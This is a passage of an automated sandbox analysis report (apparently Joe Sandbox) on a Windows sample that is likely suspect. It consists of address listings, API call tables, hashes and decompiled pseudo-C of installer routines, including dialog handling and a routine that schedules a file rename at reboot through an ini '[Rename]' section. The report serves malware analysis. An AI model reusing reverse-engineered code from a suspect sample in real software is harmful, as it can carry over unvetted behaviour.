                                                                                                                          0x004053be
                                                                                                                          0x004053c5
                                                                                                                          0x00405436
                                                                                                                          0x0040543e
                                                                                                                          0x00405446
                                                                                                                          0x00405446
                                                                                                                          0x0040544f
                                                                                                                          0x00405451
                                                                                                                          0x00405458
                                                                                                                          0x0040545b
                                                                                                                          0x0040545b
                                                                                                                          0x00405461
                                                                                                                          0x00405468
                                                                                                                          0x0040546b
                                                                                                                          0x0040546b
                                                                                                                          0x00405471
                                                                                                                          0x00405477
                                                                                                                          0x0040547d
                                                                                                                          0x0040547d
                                                                                                                          0x0040548a
                                                                                                                          0x004055eb
                                                                                                                          0x004055f2
                                                                                                                          0x0040560f
                                                                                                                          0x00405615
                                                                                                                          0x00405627
                                                                                                                          0x00405627
                                                                                                                          0x00000000
                                                                                                                          0x00405490
                                                                                                                          0x00405492
                                                                                                                          0x00405497
                                                                                                                          0x0040549c
                                                                                                                          0x004054a1
                                                                                                                          0x004054a3
                                                                                                                          0x004054a3
                                                                                                                          0x004054a4
                                                                                                                          0x004054a5
                                                                                                                          0x004054a7
                                                                                                                          0x004054a7
                                                                                                                          0x004054af
                                                                                                                          0x004054f0
                                                                                                                          0x004054f2
                                                                                                                          0x00405502
                                                                                                                          0x00405505
                                                                                                                          0x0040550a
                                                                                                                          0x00405511
                                                                                                                          0x00405514
                                                                                                                          0x004055b6
                                                                                                                          0x004055bf
                                                                                                                          0x004055c7
                                                                                                                          0x004055c7
                                                                                                                          0x004055d5
                                                                                                                          0x004055e6
                                                                                                                          0x004055e6
                                                                                                                          0x00000000
                                                                                                                          0x004055d5
                                                                                                                          0x0040551a
                                                                                                                          0x0040551d
                                                                                                                          0x00405523
                                                                                                                          0x00405528
                                                                                                                          0x0040552a
                                                                                                                          0x0040552c
                                                                                                                          0x00405532
                                                                                                                          0x00405539
                                                                                                                          0x0040553e
                                                                                                                          0x00405545
                                                                                                                          0x00405548
                                                                                                                          0x00405548
                                                                                                                          0x0040554f
                                                                                                                          0x0040555b
                                                                                                                          0x0040555f
                                                                                                                          0x00405561
                                                                                                                          0x00405561
                                                                                                                          0x00405551
                                                                                                                          0x00405553
                                                                                                                          0x00405553
                                                                                                                          0x00405581
                                                                                                                          0x0040558d
                                                                                                                          0x0040559c
                                                                                                                          0x0040559c
                                                                                                                          0x0040559e
                                                                                                                          0x004055a1
                                                                                                                          0x004055aa
                                                                                                                          0x00000000
                                                                                                                          0x004054b1
                                                                                                                          0x004054bc
                                                                                                                          0x004054bf
                                                                                                                          0x004054c4
                                                                                                                          0x004054c6
                                                                                                                          0x004054ca
                                                                                                                          0x004054da
                                                                                                                          0x004054e4
                                                                                                                          0x004054e6
                                                                                                                          0x004054e9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004054cc
                                                                                                                          0x004054cc
                                                                                                                          0x004054d2
                                                                                                                          0x004054d4
                                                                                                                          0x004054d4
                                                                                                                          0x004054d5
                                                                                                                          0x004054d6
                                                                                                                          0x00000000
                                                                                                                          0x004054cc
                                                                                                                          0x004054af
                                                                                                                          0x0040548a
                                                                                                                          0x004053cd
                                                                                                                          0x00000000
                                                                                                                          0x004053e3
                                                                                                                          0x004053ed
                                                                                                                          0x004053f2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405404
                                                                                                                          0x00405409
                                                                                                                          0x00405415
                                                                                                                          0x00405415
                                                                                                                          0x00405417
                                                                                                                          0x00405426
                                                                                                                          0x00405428
                                                                                                                          0x0040542c
                                                                                                                          0x0040542f
                                                                                                                          0x00000000
                                                                                                                          0x0040542f
                                                                                                                          0x004053cd
                                                                                                                          0x00405083
                                                                                                                          0x00405088
                                                                                                                          0x00405091
                                                                                                                          0x00405098
                                                                                                                          0x004050aa
                                                                                                                          0x004050b5
                                                                                                                          0x004050bb
                                                                                                                          0x004050c9
                                                                                                                          0x004050dd
                                                                                                                          0x004050e2
                                                                                                                          0x004050ef
                                                                                                                          0x004050f4
                                                                                                                          0x0040510a
                                                                                                                          0x0040511b
                                                                                                                          0x00405128
                                                                                                                          0x00405128
                                                                                                                          0x0040512b
                                                                                                                          0x00405131
                                                                                                                          0x00405133
                                                                                                                          0x00405136
                                                                                                                          0x0040513b
                                                                                                                          0x00405140
                                                                                                                          0x00405142
                                                                                                                          0x00405142
                                                                                                                          0x00405162
                                                                                                                          0x00405162
                                                                                                                          0x00405164
                                                                                                                          0x00405165
                                                                                                                          0x0040516a
                                                                                                                          0x00405170
                                                                                                                          0x00405174
                                                                                                                          0x00405179
                                                                                                                          0x00405181
                                                                                                                          0x00405185
                                                                                                                          0x0040518a
                                                                                                                          0x0040518f
                                                                                                                          0x00405197
                                                                                                                          0x0040519a
                                                                                                                          0x0040526a
                                                                                                                          0x0040527d
                                                                                                                          0x00000000
                                                                                                                          0x004051a0
                                                                                                                          0x004051a3
                                                                                                                          0x004051a6
                                                                                                                          0x004051a9
                                                                                                                          0x004051a9
                                                                                                                          0x004051af
                                                                                                                          0x004051b8
                                                                                                                          0x004051bb
                                                                                                                          0x004051bf
                                                                                                                          0x004051c2
                                                                                                                          0x004051c5
                                                                                                                          0x004051ce
                                                                                                                          0x004051d7
                                                                                                                          0x004051da
                                                                                                                          0x004051dd
                                                                                                                          0x004051e0
                                                                                                                          0x0040521e
                                                                                                                          0x00405249
                                                                                                                          0x00405220
                                                                                                                          0x0040522f
                                                                                                                          0x0040522f
                                                                                                                          0x004051e2
                                                                                                                          0x004051e5
                                                                                                                          0x004051f3
                                                                                                                          0x004051fd
                                                                                                                          0x00405205
                                                                                                                          0x0040520c
                                                                                                                          0x00405217
                                                                                                                          0x00405217
                                                                                                                          0x004051e0
                                                                                                                          0x0040524f
                                                                                                                          0x00405250
                                                                                                                          0x0040525c
                                                                                                                          0x0040525c
                                                                                                                          0x00405268
                                                                                                                          0x00405283
                                                                                                                          0x00405286
                                                                                                                          0x004052a3
                                                                                                                          0x00000000
                                                                                                                          0x00405288
                                                                                                                          0x0040528d
                                                                                                                          0x00405296
                                                                                                                          0x00405629
                                                                                                                          0x0040563b
                                                                                                                          0x0040563b
                                                                                                                          0x00405286
                                                                                                                          0x00000000
                                                                                                                          0x00405268
                                                                                                                          0x0040519a

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                                                                                          • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                                            • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040546B
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405627
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 2564846305-813528018
                                                                                                                          • Opcode ID: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                                                                                          • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                                                          • Opcode Fuzzy Hash: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                                                                                          • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				int _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				struct HWND__* _t56;
                                                                                                                          				intOrPtr _t69;
                                                                                                                          				signed int _t75;
                                                                                                                          				signed short* _t76;
                                                                                                                          				signed short* _t78;
                                                                                                                          				long _t92;
                                                                                                                          				int _t103;
                                                                                                                          				signed int _t110;
                                                                                                                          				intOrPtr _t113;
                                                                                                                          				WCHAR* _t114;
                                                                                                                          				signed int* _t116;
                                                                                                                          				WCHAR* _t117;
                                                                                                                          				struct HWND__* _t118;
                                                                                                                          
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                          						L13:
                                                                                                                          						if(_a8 != 0x4e) {
                                                                                                                          							if(_a8 == 0x40b) {
                                                                                                                          								 *0x421714 =  *0x421714 + 1;
                                                                                                                          							}
                                                                                                                          							L27:
                                                                                                                          							_t114 = _a16;
                                                                                                                          							L28:
                                                                                                                          							return E0040462B(_a8, _a12, _t114);
                                                                                                                          						}
                                                                                                                          						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                                                          						_t114 = _a16;
                                                                                                                          						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                                                          							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                                                          							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                                                          							_v12 = _t103;
                                                                                                                          							_v16 = _t113;
                                                                                                                          							_v8 = 0x428200;
                                                                                                                          							if(_t103 - _t113 < 0x800) {
                                                                                                                          								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                                                          								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                                                          								_push(1);
                                                                                                                          								E00404A32(_a4, _v8);
                                                                                                                          								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                                                          								_t114 = _a16;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                                                          							goto L28;
                                                                                                                          						} else {
                                                                                                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                                                          								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                                                                                          							}
                                                                                                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                                                          								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                                                                                          							}
                                                                                                                          							return 1;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                                                                                          						goto L27;
                                                                                                                          					} else {
                                                                                                                          						_t69 =  *0x422720; // 0x83cdcc
                                                                                                                          						_t29 = _t69 + 0x14; // 0x83cde0
                                                                                                                          						_t116 = _t29;
                                                                                                                          						if(( *_t116 & 0x00000020) == 0) {
                                                                                                                          							goto L27;
                                                                                                                          						}
                                                                                                                          						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                          						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                          						E00404A0E();
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t117 = _a16;
                                                                                                                          				_t75 =  *(_t117 + 0x30);
                                                                                                                          				if(_t75 < 0) {
                                                                                                                          					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                                                                                          				}
                                                                                                                          				_t76 =  *0x42a298 + _t75 * 2;
                                                                                                                          				_t110 =  *_t76 & 0x0000ffff;
                                                                                                                          				_a8 = _t110;
                                                                                                                          				_t78 =  &(_t76[1]);
                                                                                                                          				_a16 = _t78;
                                                                                                                          				_v16 = _t78;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_v8 = E00404734;
                                                                                                                          				if(_t110 != 2) {
                                                                                                                          					_v8 = E004046FA;
                                                                                                                          				}
                                                                                                                          				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                                                          				_push(0x22);
                                                                                                                          				E004045C4(_a4);
                                                                                                                          				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                                                          				_push(0x23);
                                                                                                                          				E004045C4(_a4);
                                                                                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                          				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                                                          				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                                                          				E004045F9(_t118);
                                                                                                                          				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                                                          				_t92 =  *( *0x42a270 + 0x68);
                                                                                                                          				if(_t92 < 0) {
                                                                                                                          					_t92 = GetSysColor( ~_t92);
                                                                                                                          				}
                                                                                                                          				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                                                          				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                                                          				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                                                          				 *0x421714 = 0;
                                                                                                                          				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                                                          				 *0x421714 = 0;
                                                                                                                          				return 0;
                                                                                                                          			}



















                                                                                                                          0x00404795
                                                                                                                          0x004048c2
                                                                                                                          0x0040491f
                                                                                                                          0x00404923
                                                                                                                          0x004049f0
                                                                                                                          0x004049f2
                                                                                                                          0x004049f2
                                                                                                                          0x004049f8
                                                                                                                          0x004049f8
                                                                                                                          0x004049fb
                                                                                                                          0x00000000
                                                                                                                          0x00404a02
                                                                                                                          0x00404931
                                                                                                                          0x00404937
                                                                                                                          0x00404941
                                                                                                                          0x0040494c
                                                                                                                          0x0040494f
                                                                                                                          0x00404952
                                                                                                                          0x0040495d
                                                                                                                          0x00404960
                                                                                                                          0x00404967
                                                                                                                          0x00404974
                                                                                                                          0x00404985
                                                                                                                          0x0040498b
                                                                                                                          0x00404993
                                                                                                                          0x004049a1
                                                                                                                          0x004049a7
                                                                                                                          0x004049a7
                                                                                                                          0x00404967
                                                                                                                          0x004049b1
                                                                                                                          0x00000000
                                                                                                                          0x004049bc
                                                                                                                          0x004049c0
                                                                                                                          0x004049d0
                                                                                                                          0x004049d0
                                                                                                                          0x004049d6
                                                                                                                          0x004049e2
                                                                                                                          0x004049e2
                                                                                                                          0x00000000
                                                                                                                          0x004049e6
                                                                                                                          0x004049b1
                                                                                                                          0x004048cd
                                                                                                                          0x00000000
                                                                                                                          0x004048df
                                                                                                                          0x004048df
                                                                                                                          0x004048e4
                                                                                                                          0x004048e4
                                                                                                                          0x004048ea
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404913
                                                                                                                          0x00404915
                                                                                                                          0x0040491a
                                                                                                                          0x00000000
                                                                                                                          0x0040491a
                                                                                                                          0x004048cd
                                                                                                                          0x0040479b
                                                                                                                          0x0040479e
                                                                                                                          0x004047a3
                                                                                                                          0x004047b4
                                                                                                                          0x004047b4
                                                                                                                          0x004047bc
                                                                                                                          0x004047bf
                                                                                                                          0x004047c3
                                                                                                                          0x004047c6
                                                                                                                          0x004047ca
                                                                                                                          0x004047cd
                                                                                                                          0x004047d0
                                                                                                                          0x004047d3
                                                                                                                          0x004047da
                                                                                                                          0x004047dc
                                                                                                                          0x004047dc
                                                                                                                          0x004047e6
                                                                                                                          0x004047f3
                                                                                                                          0x004047fd
                                                                                                                          0x00404802
                                                                                                                          0x00404805
                                                                                                                          0x0040480a
                                                                                                                          0x00404821
                                                                                                                          0x00404828
                                                                                                                          0x0040483b
                                                                                                                          0x0040483e
                                                                                                                          0x00404852
                                                                                                                          0x00404859
                                                                                                                          0x0040485e
                                                                                                                          0x00404863
                                                                                                                          0x00404863
                                                                                                                          0x00404871
                                                                                                                          0x0040487f
                                                                                                                          0x00404891
                                                                                                                          0x00404896
                                                                                                                          0x004048a6
                                                                                                                          0x004048a8
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                                                          • GetSysColor.USER32(?), ref: 00404863
                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404906
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                                                          • SetCursor.USER32(00000000), ref: 00404985
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                                                          • SetCursor.USER32(00000000), ref: 004049A1
                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                          • String ID: Call$N
                                                                                                                          • API String ID: 3103080414-3438112850
                                                                                                                          • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                          • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                                                          • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                          • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004062AE(void* __ecx) {
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				long _t12;
                                                                                                                          				long _t24;
                                                                                                                          				char* _t31;
                                                                                                                          				int _t37;
                                                                                                                          				void* _t38;
                                                                                                                          				intOrPtr* _t39;
                                                                                                                          				long _t42;
                                                                                                                          				WCHAR* _t44;
                                                                                                                          				void* _t46;
                                                                                                                          				void* _t48;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t52;
                                                                                                                          				void* _t53;
                                                                                                                          
                                                                                                                          				_t38 = __ecx;
                                                                                                                          				_t44 =  *(_t52 + 0x14);
                                                                                                                          				 *0x426de8 = 0x55004e;
                                                                                                                          				 *0x426dec = 0x4c;
                                                                                                                          				if(_t44 == 0) {
                                                                                                                          					L3:
                                                                                                                          					_t2 = _t52 + 0x1c; // 0x4275e8
                                                                                                                          					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                                                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                          						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                                                                                          						_t53 = _t52 + 0x10;
                                                                                                                          						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                                                                                          						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                                                                                          						_t48 = _t12;
                                                                                                                          						 *(_t53 + 0x18) = _t48;
                                                                                                                          						if(_t48 != 0xffffffff) {
                                                                                                                          							_t42 = GetFileSize(_t48, 0);
                                                                                                                          							_t6 = _t37 + 0xa; // 0xa
                                                                                                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                          							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                                                                                          								L18:
                                                                                                                          								return CloseHandle(_t48);
                                                                                                                          							} else {
                                                                                                                          								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                          									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                                                                                          									if(_t49 == 0) {
                                                                                                                          										_t48 =  *(_t53 + 0x18);
                                                                                                                          										L16:
                                                                                                                          										_t24 = _t42;
                                                                                                                          										L17:
                                                                                                                          										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                                                                                          										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                          										E0040620A(_t48, _t46, _t42 + _t37);
                                                                                                                          										GlobalFree(_t46);
                                                                                                                          										goto L18;
                                                                                                                          									}
                                                                                                                          									_t39 = _t46 + _t42;
                                                                                                                          									_t31 = _t39 + _t37;
                                                                                                                          									while(_t39 > _t49) {
                                                                                                                          										 *_t31 =  *_t39;
                                                                                                                          										_t31 = _t31 - 1;
                                                                                                                          										_t39 = _t39 - 1;
                                                                                                                          									}
                                                                                                                          									_t24 = _t49 - _t46 + 1;
                                                                                                                          									_t48 =  *(_t53 + 0x18);
                                                                                                                          									goto L17;
                                                                                                                          								}
                                                                                                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                          								_t42 = _t42 + 0xa;
                                                                                                                          								goto L16;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					CloseHandle(E00406158(_t44, 0, 1));
                                                                                                                          					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                                                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                          						goto L3;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t12;
                                                                                                                          			}



















                                                                                                                          0x004062ae
                                                                                                                          0x004062b7
                                                                                                                          0x004062be
                                                                                                                          0x004062c8
                                                                                                                          0x004062dc
                                                                                                                          0x00406304
                                                                                                                          0x0040630b
                                                                                                                          0x0040630f
                                                                                                                          0x00406313
                                                                                                                          0x00406333
                                                                                                                          0x0040633a
                                                                                                                          0x00406344
                                                                                                                          0x00406351
                                                                                                                          0x00406356
                                                                                                                          0x0040635b
                                                                                                                          0x0040635f
                                                                                                                          0x0040636e
                                                                                                                          0x00406370
                                                                                                                          0x0040637d
                                                                                                                          0x00406381
                                                                                                                          0x0040641c
                                                                                                                          0x00000000
                                                                                                                          0x00406397
                                                                                                                          0x004063a4
                                                                                                                          0x004063c8
                                                                                                                          0x004063cc
                                                                                                                          0x004063eb
                                                                                                                          0x004063ef
                                                                                                                          0x004063ef
                                                                                                                          0x004063f1
                                                                                                                          0x004063fa
                                                                                                                          0x00406405
                                                                                                                          0x00406410
                                                                                                                          0x00406416
                                                                                                                          0x00000000
                                                                                                                          0x00406416
                                                                                                                          0x004063ce
                                                                                                                          0x004063d1
                                                                                                                          0x004063dc
                                                                                                                          0x004063d8
                                                                                                                          0x004063da
                                                                                                                          0x004063db
                                                                                                                          0x004063db
                                                                                                                          0x004063e3
                                                                                                                          0x004063e5
                                                                                                                          0x00000000
                                                                                                                          0x004063e5
                                                                                                                          0x004063af
                                                                                                                          0x004063b5
                                                                                                                          0x00000000
                                                                                                                          0x004063b5
                                                                                                                          0x00406381
                                                                                                                          0x0040635f
                                                                                                                          0x004062de
                                                                                                                          0x004062e9
                                                                                                                          0x004062f2
                                                                                                                          0x004062f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062f6
                                                                                                                          0x00406427

                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                                                                            • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                            • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                                          • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                                                                                          • wsprintfA.USER32 ref: 0040632D
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                                                          • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
